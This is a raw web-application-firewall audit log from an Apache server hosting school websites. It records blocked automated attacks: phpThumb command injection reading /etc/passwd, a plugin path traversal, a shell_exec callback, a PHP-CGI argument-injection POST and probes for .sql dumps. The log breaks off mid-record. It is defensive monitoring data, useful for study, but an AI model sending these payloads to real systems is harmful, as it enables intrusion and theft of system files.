--5775c853-E-- --5775c853-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172982481034 1815 (- - -) Stopwatch2: 1747172982481034 1815; combined=633, p1=386, p2=210, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5775c853-Z-- --60f04a3c-A-- [14/May/2025:04:49:44 +0700] aCO-eMabX6K9rhby1vhLtwAAAI8 103.236.140.4 50622 103.236.140.4 8181 --60f04a3c-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876388 --60f04a3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --60f04a3c-E-- --60f04a3c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172984084956 1735 (- - -) Stopwatch2: 1747172984084956 1735; combined=583, p1=407, p2=141, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60f04a3c-Z-- --fa6c091b-A-- [14/May/2025:04:49:44 +0700] aCO-eMabX6K9rhby1vhLugAAAJQ 103.236.140.4 50622 103.236.140.4 8181 --fa6c091b-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876394 --fa6c091b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fa6c091b-E-- --fa6c091b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172984878851 1668 (- - -) Stopwatch2: 1747172984878851 1668; combined=521, p1=346, p2=142, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa6c091b-Z-- --ad6a0b32-A-- [14/May/2025:04:49:45 +0700] aCO-ecabX6K9rhby1vhLvQAAAJU 103.236.140.4 50622 103.236.140.4 8181 --ad6a0b32-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276013 --ad6a0b32-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad6a0b32-E-- --ad6a0b32-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172985478165 1725 (- - -) Stopwatch2: 1747172985478165 1725; combined=554, p1=386, p2=131, p3=0, p4=0, p5=37, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad6a0b32-Z-- --d0fc9a47-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLxQAAAIU 103.236.140.4 50622 103.236.140.4 8181 --d0fc9a47-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276025 --d0fc9a47-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 
--d0fc9a47-E-- --d0fc9a47-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987078254 1696 (- - -) Stopwatch2: 1747172987078254 1696; combined=576, p1=412, p2=138, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0fc9a47-Z-- --4bea2b06-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLxgAAAIc 103.236.140.4 50622 103.236.140.4 8181 --4bea2b06-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876412 --4bea2b06-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4bea2b06-E-- --4bea2b06-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987278381 1704 (- - -) Stopwatch2: 1747172987278381 1704; combined=543, p1=382, p2=130, p3=0, p4=0, p5=31, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bea2b06-Z-- --ac3a9666-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLxwAAAIY 103.236.140.4 50622 103.236.140.4 8181 --ac3a9666-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276028 --ac3a9666-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; 
charset=iso-8859-1 --ac3a9666-E-- --ac3a9666-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987477134 1749 (- - -) Stopwatch2: 1747172987477134 1749; combined=571, p1=410, p2=130, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac3a9666-Z-- --1986ac5f-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLyAAAAIg 103.236.140.4 50622 103.236.140.4 8181 --1986ac5f-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876415 --1986ac5f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1986ac5f-E-- --1986ac5f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987676900 2189 (- - -) Stopwatch2: 1747172987676900 2189; combined=651, p1=462, p2=147, p3=0, p4=0, p5=41, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1986ac5f-Z-- --d9406c46-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLyQAAAIo 103.236.140.4 50622 103.236.140.4 8181 --d9406c46-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276031 --d9406c46-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d9406c46-E-- --d9406c46-H-- Message: Access 
denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987877979 1601 (- - -) Stopwatch2: 1747172987877979 1601; combined=520, p1=362, p2=128, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9406c46-Z-- --e4efb620-A-- [14/May/2025:04:49:48 +0700] aCO-fMabX6K9rhby1vhLygAAAIk 103.236.140.4 50622 103.236.140.4 8181 --e4efb620-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876418 --e4efb620-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN 
Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e4efb620-E-- --e4efb620-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172988076263 1665 (- - -) Stopwatch2: 1747172988076263 1665; combined=559, p1=392, p2=128, p3=0, p4=0, p5=38, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4efb620-Z-- --133c4631-A-- [14/May/2025:04:49:48 +0700] aCO-fMabX6K9rhby1vhLywAAAIw 103.236.140.4 50622 103.236.140.4 8181 --133c4631-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276034 --133c4631-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --133c4631-E-- --133c4631-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172988276540 1746 (- - -) Stopwatch2: 1747172988276540 1746; combined=544, p1=383, p2=130, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --133c4631-Z-- --d2a5436e-A-- [14/May/2025:05:06:25 +0700] aCPCYV1ltXwOneQqchOtgAAAAAM 103.236.140.4 50936 103.236.140.4 8181 --d2a5436e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 218.250.231.191 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 218.250.231.191 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d2a5436e-C-- --d2a5436e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2a5436e-E-- --d2a5436e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747173985453181 4811 (- - -) Stopwatch2: 1747173985453181 4811; combined=3033, p1=464, p2=2532, p3=0, p4=0, p5=36, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2a5436e-Z-- --f5566121-A-- [14/May/2025:06:45:51 +0700] aCPZrzMGvM3GPb0-SyRVbgAAAEY 103.236.140.4 35224 103.236.140.4 8181 --f5566121-B-- GET /prod.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.231.102.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.231.102.51 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --f5566121-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5566121-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179951497519 2135 (- - -) Stopwatch2: 1747179951497519 2135; combined=699, p1=332, p2=344, p3=0, p4=0, p5=22, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5566121-Z-- --d6f56344-A-- [14/May/2025:06:45:53 +0700] aCPZsV1ltXwOneQqchOy9gAAAAc 103.236.140.4 35324 103.236.140.4 8181 --d6f56344-B-- GET /wordpress_f.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.231.102.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.231.102.51 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) 